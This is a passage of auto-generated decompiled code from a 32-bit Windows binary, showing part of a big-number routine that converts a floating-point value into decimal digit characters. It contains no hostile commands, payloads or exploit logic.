                    												if( *((intOrPtr*)(_t1232 + _t1083 - 0x570)) !=  *((intOrPtr*)(_t1232 + _t1083 - 0x1d0))) {
                    													goto L53;
                    												}
                    												_t1083 = _t1083 + 4;
                    												__eflags = _t1083 - 8;
                    												if(_t1083 != 8) {
                    													continue;
                    												} else {
                    													_t982 = _v1872 + 2;
                    													_t983 = _t982 & 0x0000001f;
                    													_t1084 = 0x20;
                    													_t1085 = _t1084 - _t983;
                    													_v1888 = _t983;
                    													_t1228 = _t982 >> 5;
                    													_v1876 = _t1228;
                    													_v1908 = _t1085;
                    													_t986 = E013F30E0(1, _t1085, 0);
                    													_v1896 = _v1896 & 0x00000000;
                    													_t987 = _t986 - 1;
                    													__eflags = _t987;
                    													asm("bsr ecx, edi");
                    													_v1884 = _t987;
                    													_v1912 =  !_t987;
                    													if(_t987 == 0) {
                    														_t1086 = 0;
                    														__eflags = 0;
                    													} else {
                    														_t1086 = _t1085 + 1;
                    													}
                    													_t989 = 0x20;
                    													_t990 = _t989 - _t1086;
                    													_t1139 = _t1228 + 2;
                    													__eflags = _v1888 - _t990;
                    													_v1880 = _t1139;
                    													_t991 = _t990 & 0xffffff00 | _v1888 - _t990 > 0x00000000;
                    													__eflags = _t1139 - 0x73;
                    													_v1865 = _t991;
                    													_t1087 = _t1086 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
                    													__eflags = _t1139 - 0x73;
                    													if(_t1139 != 0x73) {
                    														L28:
                    														_t992 = 0;
                    														__eflags = 0;
                    													} else {
                    														__eflags = _t991;
                    														if(_t991 == 0) {
                    															goto L28;
                    														} else {
                    															_t992 = 1;
                    														}
                    													}
                    													__eflags = _t1087;
                    													if(_t1087 != 0) {
                    														L50:
                    														__eflags = 0;
                    														_t1022 = 0x1cc;
                    														_push(0);
                    														_v1400 = 0;
                    														_v472 = 0;
                    														_push( &_v1396);
                    														_push(0x1cc);
                    														_push( &_v468);
                    														L313();
                    														_t1234 =  &(_t1234[4]);
                    													} else {
                    														__eflags = _t992;
                    														if(_t992 != 0) {
                    															goto L50;
                    														} else {
                    															_t1090 = 0x72;
                    															__eflags = _t1139 - _t1090;
                    															if(_t1139 >= _t1090) {
                    																_t1139 = _t1090;
                    																_v1880 = _t1090;
                    															}
                    															_t1091 = _t1139;
                    															_v1892 = _t1091;
                    															__eflags = _t1139 - 0xffffffff;
                    															if(_t1139 != 0xffffffff) {
                    																_t1140 = _v1876;
                    																_t1230 = _t1139 - _t1140;
                    																__eflags = _t1230;
                    																_t1001 =  &_v468 + _t1230 * 4;
                    																_v1872 = _t1001;
                    																while(1) {
                    																	__eflags = _t1091 - _t1140;
                    																	if(_t1091 < _t1140) {
                    																		break;
                    																	}
                    																	__eflags = _t1230 - _t1019;
                    																	if(_t1230 >= _t1019) {
                    																		_t1189 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1189 =  *_t1001;
                    																	}
                    																	__eflags = _t1230 - 1 - _t1019;
                    																	if(_t1230 - 1 >= _t1019) {
                    																		_t1003 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1003 =  *(_v1872 - 4);
                    																	}
                    																	_t1096 = _v1892;
                    																	 *(_t1232 + _t1096 * 4 - 0x1d0) = (_t1003 & _v1912) >> _v1908 | (_t1189 & _v1884) << _v1888;
                    																	_t1091 = _t1096 - 1;
                    																	_t1230 = _t1230 - 1;
                    																	_t1001 = _v1872 - 4;
                    																	_v1892 = _t1091;
                    																	_v1872 = _t1001;
                    																	__eflags = _t1091 - 0xffffffff;
                    																	if(_t1091 != 0xffffffff) {
                    																		_t1019 = _v472;
                    																		continue;
                    																	}
                    																	break;
                    																}
                    																_t1139 = _v1880;
                    																_t1228 = _v1876;
                    															}
                    															__eflags = _t1228;
                    															if(_t1228 != 0) {
                    																__eflags = 0;
                    																memset( &_v468, 0, _t1228 << 2);
                    																_t1234 =  &(_t1234[3]);
                    															}
                    															__eflags = _v1865;
                    															_t1022 = 0x1cc;
                    															if(_v1865 == 0) {
                    																_v472 = _t1139;
                    															} else {
                    																_v472 = _t1139 + 1;
                    															}
                    														}
                    													}
                    													_v1392 = _v1392 & 0x00000000;
                    													_t996 = 4;
                    													__eflags = 1;
                    													_v1396 = _t996;
                    													_v1400 = 1;
                    													_v936 = 1;
                    													_push(_t996);
                    												}
                    												goto L52;
                    											}
                    											goto L53;
                    										}
                    										L52:
                    										_push( &_v1396);
                    										_push(_t1022);
                    										_push( &_v932);
                    										L313();
                    										_t1238 =  &(_t1234[4]);
                    									}
                    									_t781 = _v1904;
                    									_t1040 = 0xa;
                    									_v1912 = _t1040;
                    									__eflags = _t781;
                    									if(_t781 < 0) {
                    										_t782 =  ~_t781;
                    										_t783 = _t782 / _t1040;
                    										_v1880 = _t783;
                    										_t1041 = _t782 % _t1040;
                    										_v1884 = _t1041;
                    										__eflags = _t783;
                    										if(_t783 == 0) {
                    											L249:
                    											__eflags = _t1041;
                    											if(_t1041 != 0) {
                    												_t817 =  *(0x1423794 + _t1041 * 4);
                    												_v1896 = _t817;
                    												__eflags = _t817;
                    												if(_t817 == 0) {
                    													L260:
                    													__eflags = 0;
                    													_push(0);
                    													_v472 = 0;
                    													_v2408 = 0;
                    													goto L261;
                    												} else {
                    													__eflags = _t817 - 1;
                    													if(_t817 != 1) {
                    														_t1052 = _v472;
                    														__eflags = _t1052;
                    														if(_t1052 != 0) {
                    															_t1158 = 0;
                    															_t1210 = 0;
                    															__eflags = 0;
                    															do {
                    																_t1110 = _t817 *  *(_t1232 + _t1210 * 4 - 0x1d0) >> 0x20;
                    																 *(_t1232 + _t1210 * 4 - 0x1d0) = _t817 *  *(_t1232 + _t1210 * 4 - 0x1d0) + _t1158;
                    																_t817 = _v1896;
                    																asm("adc edx, 0x0");
                    																_t1210 = _t1210 + 1;
                    																_t1158 = _t1110;
                    																__eflags = _t1210 - _t1052;
                    															} while (_t1210 != _t1052);
                    															__eflags = _t1158;
                    															if(_t1158 != 0) {
                    																_t823 = _v472;
                    																__eflags = _t823 - 0x73;
                    																if(_t823 >= 0x73) {
                    																	goto L260;
                    																} else {
                    																	 *(_t1232 + _t823 * 4 - 0x1d0) = _t1158;
                    																	_v472 = _v472 + 1;
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t783 - 0x26;
                    												if(_t783 > 0x26) {
                    													_t783 = 0x26;
                    												}
                    												_t1053 =  *(0x14236fe + _t783 * 4) & 0x000000ff;
                    												_v1872 = _t783;
                    												_v1400 = ( *(0x14236fe + _t783 * 4) & 0x000000ff) + ( *(0x14236ff + _t783 * 4) & 0x000000ff);
                    												E013F5890(_t1053 << 2,  &_v1396, 0, _t1053 << 2);
                    												_t834 = E013F5310( &(( &_v1396)[_t1053]), 0x1422df8 + ( *(0x14236fc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x14236ff + _t783 * 4) & 0x000000ff) << 2);
                    												_t1054 = _v1400;
                    												_t1238 =  &(_t1238[6]);
                    												_v1892 = _t1054;
                    												__eflags = _t1054 - 1;
                    												if(_t1054 > 1) {
                    													__eflags = _v472 - 1;
                    													if(_v472 > 1) {
                    														__eflags = _t1054 - _v472;
                    														_t1161 =  &_v1396;
                    														_t835 = _t834 & 0xffffff00 | _t1054 - _v472 > 0x00000000;
                    														__eflags = _t835;
                    														if(_t835 != 0) {
                    															_t1111 =  &_v468;
                    														} else {
                    															_t1161 =  &_v468;
                    															_t1111 =  &_v1396;
                    														}
                    														_v1908 = _t1111;
                    														__eflags = _t835;
                    														if(_t835 == 0) {
                    															_t1054 = _v472;
                    														}
                    														_v1876 = _t1054;
                    														__eflags = _t835;
                    														if(_t835 != 0) {
                    															_v1892 = _v472;
                    														}
                    														_t1112 = 0;
                    														_t1212 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1054;
                    														if(_t1054 == 0) {
                    															L243:
                    															_v472 = _t1112;
                    															_t837 = _t1112 << 2;
                    															__eflags = _t837;
                    															_push(_t837);
                    															_t838 =  &_v1860;
                    															goto L244;
                    														} else {
                    															_t1162 = _t1161 -  &_v1860;
                    															__eflags = _t1162;
                    															_v1928 = _t1162;
                    															do {
                    																_t844 =  *(_t1232 + _t1162 + _t1212 * 4 - 0x740);
                    																_v1896 = _t844;
                    																__eflags = _t844;
                    																if(_t844 != 0) {
                    																	_t845 = 0;
                    																	_t1163 = 0;
                    																	_t1055 = _t1212;
                    																	_v1888 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L240:
                    																		__eflags = _t1055 - 0x73;
                    																		if(_t1055 == 0x73) {
                    																			goto L258;
                    																		} else {
                    																			_t1162 = _v1928;
                    																			_t1054 = _v1876;
                    																			goto L242;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1055 - 0x73;
                    																			if(_t1055 == 0x73) {
                    																				goto L235;
                    																			}
                    																			__eflags = _t1055 - _t1112;
                    																			if(_t1055 == _t1112) {
                    																				 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) & 0x00000000;
                    																				_t856 = _t845 + 1 + _t1212;
                    																				__eflags = _t856;
                    																				_v1864 = _t856;
                    																				_t845 = _v1888;
                    																			}
                    																			_t851 =  *(_v1908 + _t845 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) + _t851 * _v1896 + _t1163;
                    																			asm("adc edx, 0x0");
                    																			_t845 = _v1888 + 1;
                    																			_t1055 = _t1055 + 1;
                    																			_v1888 = _t845;
                    																			_t1163 = _t851 * _v1896 >> 0x20;
                    																			_t1112 = _v1864;
                    																			__eflags = _t845 - _v1892;
                    																			if(_t845 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L235;
                    																			}
                    																			while(1) {
                    																				L235:
                    																				__eflags = _t1163;
                    																				if(_t1163 == 0) {
                    																					goto L240;
                    																				}
                    																				__eflags = _t1055 - 0x73;
                    																				if(_t1055 == 0x73) {
                    																					goto L258;
                    																				} else {
                    																					__eflags = _t1055 - _t1112;
                    																					if(_t1055 == _t1112) {
                    																						_t558 = _t1232 + _t1055 * 4 - 0x740;
                    																						 *_t558 =  *(_t1232 + _t1055 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t558;
                    																						_t564 = _t1055 + 1; // 0x1
                    																						_v1864 = _t564;
                    																					}
                    																					_t849 = _t1163;
                    																					_t1163 = 0;
                    																					 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) + _t849;
                    																					_t1112 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1055 = _t1055 + 1;
                    																					continue;
                    																				}
                    																				goto L246;
                    																			}
                    																			goto L240;
                    																		}
                    																		goto L235;
                    																	}
                    																} else {
                    																	__eflags = _t1212 - _t1112;
                    																	if(_t1212 == _t1112) {
                    																		 *(_t1232 + _t1212 * 4 - 0x740) =  *(_t1232 + _t1212 * 4 - 0x740) & _t844;
                    																		_t526 = _t1212 + 1; // 0x1
                    																		_t1112 = _t526;
                    																		_v1864 = _t1112;
                    																	}
                    																	goto L242;
                    																}
                    																goto L246;
                    																L242:
                    																_t1212 = _t1212 + 1;
                    																__eflags = _t1212 - _t1054;
                    															} while (_t1212 != _t1054);
                    															goto L243;
                    														}
                    													} else {
                    														_t1164 = _v468;
                    														_push(_t1054 << 2);
                    														_v472 = _t1054;
                    														_push( &_v1396);
                    														_push(_t1022);
                    														_push( &_v468);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														__eflags = _t1164;
                    														if(_t1164 == 0) {
                    															goto L203;
                    														} else {
                    															__eflags = _t1164 - 1;
                    															if(_t1164 == 1) {
                    																goto L245;
                    															} else {
                    																__eflags = _v472;
                    																if(_v472 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t1056 = 0;
                    																	_v1896 = _v472;
                    																	_t1213 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t864 = _t1164;
                    																		_t1113 = _t864 *  *(_t1232 + _t1213 * 4 - 0x1d0) >> 0x20;
                    																		 *(_t1232 + _t1213 * 4 - 0x1d0) = _t864 *  *(_t1232 + _t1213 * 4 - 0x1d0) + _t1056;
                    																		asm("adc edx, 0x0");
                    																		_t1213 = _t1213 + 1;
                    																		_t1056 = _t1113;
                    																		__eflags = _t1213 - _v1896;
                    																	} while (_t1213 != _v1896);
                    																	goto L208;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													_t1165 = _v1396;
                    													__eflags = _t1165;
                    													if(_t1165 != 0) {
                    														__eflags = _t1165 - 1;
                    														if(_t1165 == 1) {
                    															goto L245;
                    														} else {
                    															__eflags = _v472;
                    															if(_v472 == 0) {
                    																goto L245;
                    															} else {
                    																_t1057 = 0;
                    																_v1896 = _v472;
                    																_t1214 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t869 = _t1165;
                    																	_t1114 = _t869 *  *(_t1232 + _t1214 * 4 - 0x1d0) >> 0x20;
                    																	 *(_t1232 + _t1214 * 4 - 0x1d0) = _t869 *  *(_t1232 + _t1214 * 4 - 0x1d0) + _t1057;
                    																	asm("adc edx, 0x0");
                    																	_t1214 = _t1214 + 1;
                    																	_t1057 = _t1114;
                    																	__eflags = _t1214 - _v1896;
                    																} while (_t1214 != _v1896);
                    																L208:
                    																__eflags = _t1056;
                    																if(_t1056 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t867 = _v472;
                    																	__eflags = _t867 - 0x73;
                    																	if(_t867 >= 0x73) {
                    																		L258:
                    																		_push(0);
                    																		_v2408 = 0;
                    																		_v472 = 0;
                    																		_push( &_v2404);
                    																		_push(_t1022);
                    																		_push( &_v468);
                    																		L313();
                    																		_t1238 =  &(_t1238[4]);
                    																		_t840 = 0;
                    																	} else {
                    																		 *(_t1232 + _t867 * 4 - 0x1d0) = _t1056;
                    																		_v472 = _v472 + 1;
                    																		goto L245;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														L203:
                    														_v2408 = 0;
                    														_v472 = 0;
                    														_push(0);
                    														_t838 =  &_v2404;
                    														L244:
                    														_push(_t838);
                    														_push(_t1022);
                    														_push( &_v468);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														L245:
                    														_t840 = 1;
                    													}
                    												}
                    												L246:
                    												__eflags = _t840;
                    												if(_t840 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_v472 = _v472 & 0x00000000;
                    													_push(0);
                    													L261:
                    													_push( &_v2404);
                    													_t820 =  &_v468;
                    													goto L262;
                    												} else {
                    													goto L247;
                    												}
                    												goto L263;
                    												L247:
                    												_t783 = _v1880 - _v1872;
                    												__eflags = _t783;
                    												_v1880 = _t783;
                    											} while (_t783 != 0);
                    											_t1041 = _v1884;
                    											goto L249;
                    										}
                    									} else {
                    										_t872 = _t781 / _t1040;
                    										_v1908 = _t872;
                    										_t1058 = _t781 % _t1040;
                    										_v1896 = _t1058;
                    										__eflags = _t872;
                    										if(_t872 == 0) {
                    											L184:
                    											__eflags = _t1058;
                    											if(_t1058 != 0) {
                    												_t1166 =  *(0x1423794 + _t1058 * 4);
                    												__eflags = _t1166;
                    												if(_t1166 != 0) {
                    													__eflags = _t1166 - 1;
                    													if(_t1166 != 1) {
                    														_t873 = _v936;
                    														_v1896 = _t873;
                    														__eflags = _t873;
                    														if(_t873 != 0) {
                    															_t1215 = 0;
                    															_t1059 = 0;
                    															__eflags = 0;
                    															do {
                    																_t874 = _t1166;
                    																_t1118 = _t874 *  *(_t1232 + _t1059 * 4 - 0x3a0) >> 0x20;
                    																 *(_t1232 + _t1059 * 4 - 0x3a0) = _t874 *  *(_t1232 + _t1059 * 4 - 0x3a0) + _t1215;
                    																asm("adc edx, 0x0");
                    																_t1059 = _t1059 + 1;
                    																_t1215 = _t1118;
                    																__eflags = _t1059 - _v1896;
                    															} while (_t1059 != _v1896);
                    															__eflags = _t1215;
                    															if(_t1215 != 0) {
                    																_t877 = _v936;
                    																__eflags = _t877 - 0x73;
                    																if(_t877 >= 0x73) {
                    																	goto L186;
                    																} else {
                    																	 *(_t1232 + _t877 * 4 - 0x3a0) = _t1215;
                    																	_v936 = _v936 + 1;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													L186:
                    													_v2408 = 0;
                    													_v936 = 0;
                    													_push(0);
                    													goto L190;
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t872 - 0x26;
                    												if(_t872 > 0x26) {
                    													_t872 = 0x26;
                    												}
                    												_t1060 =  *(0x14236fe + _t872 * 4) & 0x000000ff;
                    												_v1888 = _t872;
                    												_v1400 = ( *(0x14236fe + _t872 * 4) & 0x000000ff) + ( *(0x14236ff + _t872 * 4) & 0x000000ff);
                    												E013F5890(_t1060 << 2,  &_v1396, 0, _t1060 << 2);
                    												_t890 = E013F5310( &(( &_v1396)[_t1060]), 0x1422df8 + ( *(0x14236fc + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x14236ff + _t872 * 4) & 0x000000ff) << 2);
                    												_t1061 = _v1400;
                    												_t1238 =  &(_t1238[6]);
                    												_v1892 = _t1061;
                    												__eflags = _t1061 - 1;
                    												if(_t1061 > 1) {
                    													__eflags = _v936 - 1;
                    													if(_v936 > 1) {
                    														__eflags = _t1061 - _v936;
                    														_t1169 =  &_v1396;
                    														_t891 = _t890 & 0xffffff00 | _t1061 - _v936 > 0x00000000;
                    														__eflags = _t891;
                    														if(_t891 != 0) {
                    															_t1119 =  &_v932;
                    														} else {
                    															_t1169 =  &_v932;
                    															_t1119 =  &_v1396;
                    														}
                    														_v1876 = _t1119;
                    														__eflags = _t891;
                    														if(_t891 == 0) {
                    															_t1061 = _v936;
                    														}
                    														_v1880 = _t1061;
                    														__eflags = _t891;
                    														if(_t891 != 0) {
                    															_v1892 = _v936;
                    														}
                    														_t1120 = 0;
                    														_t1217 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1061;
                    														if(_t1061 == 0) {
                    															L177:
                    															_v936 = _t1120;
                    															_t893 = _t1120 << 2;
                    															__eflags = _t893;
                    															goto L178;
                    														} else {
                    															_t1170 = _t1169 -  &_v1860;
                    															__eflags = _t1170;
                    															_v1928 = _t1170;
                    															do {
                    																_t900 =  *(_t1232 + _t1170 + _t1217 * 4 - 0x740);
                    																_v1884 = _t900;
                    																__eflags = _t900;
                    																if(_t900 != 0) {
                    																	_t901 = 0;
                    																	_t1171 = 0;
                    																	_t1062 = _t1217;
                    																	_v1872 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L174:
                    																		__eflags = _t1062 - 0x73;
                    																		if(_t1062 == 0x73) {
                    																			goto L187;
                    																		} else {
                    																			_t1170 = _v1928;
                    																			_t1061 = _v1880;
                    																			goto L176;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1062 - 0x73;
                    																			if(_t1062 == 0x73) {
                    																				goto L169;
                    																			}
                    																			__eflags = _t1062 - _t1120;
                    																			if(_t1062 == _t1120) {
                    																				 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) & 0x00000000;
                    																				_t912 = _t901 + 1 + _t1217;
                    																				__eflags = _t912;
                    																				_v1864 = _t912;
                    																				_t901 = _v1872;
                    																			}
                    																			_t907 =  *(_v1876 + _t901 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) + _t907 * _v1884 + _t1171;
                    																			asm("adc edx, 0x0");
                    																			_t901 = _v1872 + 1;
                    																			_t1062 = _t1062 + 1;
                    																			_v1872 = _t901;
                    																			_t1171 = _t907 * _v1884 >> 0x20;
                    																			_t1120 = _v1864;
                    																			__eflags = _t901 - _v1892;
                    																			if(_t901 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L169;
                    																			}
                    																			while(1) {
                    																				L169:
                    																				__eflags = _t1171;
                    																				if(_t1171 == 0) {
                    																					goto L174;
                    																				}
                    																				__eflags = _t1062 - 0x73;
                    																				if(_t1062 == 0x73) {
                    																					L187:
                    																					__eflags = 0;
                    																					_v2408 = 0;
                    																					_v936 = 0;
                    																					_push(0);
                    																					_t903 =  &_v2404;
                    																					goto L188;
                    																				} else {
                    																					__eflags = _t1062 - _t1120;
                    																					if(_t1062 == _t1120) {
                    																						_t370 = _t1232 + _t1062 * 4 - 0x740;
                    																						 *_t370 =  *(_t1232 + _t1062 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t370;
                    																						_t376 = _t1062 + 1; // 0x1
                    																						_v1864 = _t376;
                    																					}
                    																					_t905 = _t1171;
                    																					_t1171 = 0;
                    																					 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) + _t905;
                    																					_t1120 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1062 = _t1062 + 1;
                    																					continue;
                    																				}
                    																				goto L181;
                    																			}
                    																			goto L174;
                    																		}
                    																		goto L169;
                    																	}
                    																} else {
                    																	__eflags = _t1217 - _t1120;
                    																	if(_t1217 == _t1120) {
                    																		 *(_t1232 + _t1217 * 4 - 0x740) =  *(_t1232 + _t1217 * 4 - 0x740) & _t900;
                    																		_t338 = _t1217 + 1; // 0x1
                    																		_t1120 = _t338;
                    																		_v1864 = _t1120;
                    																	}
                    																	goto L176;
                    																}
                    																goto L181;
                    																L176:
                    																_t1217 = _t1217 + 1;
                    																__eflags = _t1217 - _t1061;
                    															} while (_t1217 != _t1061);
                    															goto L177;
                    														}
                    													} else {
                    														_t1172 = _v932;
                    														_push(_t1061 << 2);
                    														_v936 = _t1061;
                    														_push( &_v1396);
                    														_push(_t1022);
                    														_push( &_v932);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														__eflags = _t1172;
                    														if(_t1172 != 0) {
                    															__eflags = _t1172 - 1;
                    															if(_t1172 == 1) {
                    																goto L180;
                    															} else {
                    																__eflags = _v936;
                    																if(_v936 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t1063 = 0;
                    																	_v1884 = _v936;
                    																	_t1218 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t919 = _t1172;
                    																		_t1121 = _t919 *  *(_t1232 + _t1218 * 4 - 0x3a0) >> 0x20;
                    																		 *(_t1232 + _t1218 * 4 - 0x3a0) = _t919 *  *(_t1232 + _t1218 * 4 - 0x3a0) + _t1063;
                    																		asm("adc edx, 0x0");
                    																		_t1218 = _t1218 + 1;
                    																		_t1063 = _t1121;
                    																		__eflags = _t1218 - _v1884;
                    																	} while (_t1218 != _v1884);
                    																	goto L149;
                    																}
                    															}
                    														} else {
                    															_v1400 = 0;
                    															_v936 = 0;
                    															_push(0);
                    															_t894 =  &_v1396;
                    															goto L179;
                    														}
                    													}
                    												} else {
                    													_t1173 = _v1396;
                    													__eflags = _t1173;
                    													if(_t1173 != 0) {
                    														__eflags = _t1173 - 1;
                    														if(_t1173 == 1) {
                    															goto L180;
                    														} else {
                    															__eflags = _v936;
                    															if(_v936 == 0) {
                    																goto L180;
                    															} else {
                    																_t1064 = 0;
                    																_v1884 = _v936;
                    																_t1219 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t926 = _t1173;
                    																	_t1122 = _t926 *  *(_t1232 + _t1219 * 4 - 0x3a0) >> 0x20;
                    																	 *(_t1232 + _t1219 * 4 - 0x3a0) = _t926 *  *(_t1232 + _t1219 * 4 - 0x3a0) + _t1064;
                    																	asm("adc edx, 0x0");
                    																	_t1219 = _t1219 + 1;
                    																	_t1064 = _t1122;
                    																	__eflags = _t1219 - _v1884;
                    																} while (_t1219 != _v1884);
                    																L149:
                    																__eflags = _t1063;
                    																if(_t1063 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t922 = _v936;
                    																	__eflags = _t922 - 0x73;
                    																	if(_t922 < 0x73) {
                    																		 *(_t1232 + _t922 * 4 - 0x3a0) = _t1063;
                    																		_v936 = _v936 + 1;
                    																		goto L180;
                    																	} else {
                    																		_v1400 = 0;
                    																		_v936 = 0;
                    																		_push(0);
                    																		_t903 =  &_v1396;
                    																		L188:
                    																		_push(_t903);
                    																		_push(_t1022);
                    																		_push( &_v932);
                    																		L313();
                    																		_t1238 =  &(_t1238[4]);
                    																		_t896 = 0;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t893 = 0;
                    														_v1864 = 0;
                    														_v936 = 0;
                    														L178:
                    														_push(_t893);
                    														_t894 =  &_v1860;
                    														L179:
                    														_push(_t894);
                    														_push(_t1022);
                    														_push( &_v932);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														L180:
                    														_t896 = 1;
                    													}
                    												}
                    												L181:
                    												__eflags = _t896;
                    												if(_t896 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_t404 =  &_v936;
                    													 *_t404 = _v936 & 0x00000000;
                    													__eflags =  *_t404;
                    													_push(0);
                    													L190:
                    													_push( &_v2404);
                    													_t820 =  &_v932;
                    													L262:
                    													_push(_t1022);
                    													_push(_t820);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
                    													goto L182;
                    												}
                    												goto L263;
                    												L182:
                    												_t872 = _v1908 - _v1888;
                    												__eflags = _t872;
                    												_v1908 = _t872;
                    											} while (_t872 != 0);
                    											_t1058 = _v1896;
                    											goto L184;
                    										}
                    									}
                    									L263:
                    									_t1153 = _v1920;
                    									_t1205 = _t1153;
                    									_t1042 = _v472;
                    									_v1872 = _t1205;
                    									__eflags = _t1042;
                    									if(_t1042 != 0) {
                    										_t1209 = 0;
                    										_t1157 = 0;
                    										__eflags = 0;
                    										do {
                    											_t810 =  *(_t1232 + _t1157 * 4 - 0x1d0);
                    											_t1108 = 0xa;
                    											_t1109 = _t810 * _t1108 >> 0x20;
                    											 *(_t1232 + _t1157 * 4 - 0x1d0) = _t810 * _t1108 + _t1209;
                    											asm("adc edx, 0x0");
                    											_t1157 = _t1157 + 1;
                    											_t1209 = _t1109;
                    											__eflags = _t1157 - _t1042;
                    										} while (_t1157 != _t1042);
                    										_v1896 = _t1209;
                    										__eflags = _t1209;
                    										_t1205 = _v1872;
                    										if(_t1209 != 0) {
                    											_t1051 = _v472;
                    											__eflags = _t1051 - 0x73;
                    											if(_t1051 >= 0x73) {
                    												__eflags = 0;
                    												_push(0);
                    												_v2408 = 0;
                    												_v472 = 0;
                    												_push( &_v2404);
                    												_push(_t1022);
                    												_push( &_v468);
                    												L313();
                    												_t1238 =  &(_t1238[4]);
                    											} else {
                    												 *(_t1232 + _t1051 * 4 - 0x1d0) = _t1109;
                    												_v472 = _v472 + 1;
                    											}
                    										}
                    										_t1153 = _t1205;
                    									}
                    									_t786 = E01401420( &_v472,  &_v936);
                    									_t1101 = 0xa;
                    									__eflags = _t786 - _t1101;
                    									if(_t786 != _t1101) {
                    										__eflags = _t786;
                    										if(_t786 != 0) {
                    											_t787 = _t786 + 0x30;
                    											__eflags = _t787;
                    											_t1205 = _t1153 + 1;
                    											 *_t1153 = _t787;
                    											_v1872 = _t1205;
                    											goto L282;
                    										} else {
                    											_t788 = _v1904 - 1;
                    										}
                    									} else {
                    										_v1904 = _v1904 + 1;
                    										_t1205 = _t1153 + 1;
                    										_t802 = _v936;
                    										 *_t1153 = 0x31;
                    										_v1872 = _t1205;
                    										__eflags = _t802;
                    										if(_t802 != 0) {
                    											_t1156 = 0;
                    											_t1208 = _t802;
                    											_t1050 = 0;
                    											__eflags = 0;
                    											do {
                    												_t803 =  *(_t1232 + _t1050 * 4 - 0x3a0);
                    												 *(_t1232 + _t1050 * 4 - 0x3a0) = _t803 * _t1101 + _t1156;
                    												asm("adc edx, 0x0");
                    												_t1050 = _t1050 + 1;
                    												_t1156 = _t803 * _t1101 >> 0x20;
                    												_t1101 = 0xa;
                    												__eflags = _t1050 - _t1208;
                    											} while (_t1050 != _t1208);
                    											_t1205 = _v1872;
                    											__eflags = _t1156;
                    											if(_t1156 != 0) {
                    												_t806 = _v936;
                    												__eflags = _t806 - 0x73;
                    												if(_t806 >= 0x73) {
                    													_push(0);
                    													_v2408 = 0;
                    													_v936 = 0;
                    													_push( &_v2404);
                    													_push(_t1022);
                    													_push( &_v932);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
                    													 *(_t1232 + _t806 * 4 - 0x3a0) = _t1156;
                    													_v936 = _v936 + 1;
                    												}
                    											}
                    										}
                    										L282:
                    										_t788 = _v1904;
                    									}
                    									 *((intOrPtr*)(_v1924 + 4)) = _t788;
                    									_t1028 = _v1916;
                    									__eflags = _t788;
                    									if(_t788 >= 0) {
                    										__eflags = _t1028 - 0x7fffffff;
                    										if(_t1028 <= 0x7fffffff) {
                    											_t1028 = _t1028 + _t788;
                    											__eflags = _t1028;
                    										}
                    									}
                    									_t790 = _a24 - 1;
                    									__eflags = _t790 - _t1028;
                    									if(_t790 >= _t1028) {
                    										_t790 = _t1028;
                    									}
                    									_t737 = _t790 + _v1920;
                    									_v1916 = _t737;
                    									__eflags = _t1205 - _t737;
                    									if(__eflags != 0) {
                    										while(1) {
                    											_t737 = _v472;
                    											__eflags = _t737;
                    											if(__eflags == 0) {
                    												goto L303;
                    											}
                    											_t1154 = 0;
                    											_t1206 = _t737;
                    											_t1046 = 0;
                    											__eflags = 0;
                    											do {
                    												_t791 =  *(_t1232 + _t1046 * 4 - 0x1d0);
                    												 *(_t1232 + _t1046 * 4 - 0x1d0) = _t791 * 0x3b9aca00 + _t1154;
                    												asm("adc edx, 0x0");
                    												_t1046 = _t1046 + 1;
                    												_t1154 = _t791 * 0x3b9aca00 >> 0x20;
                    												__eflags = _t1046 - _t1206;
                    											} while (_t1046 != _t1206);
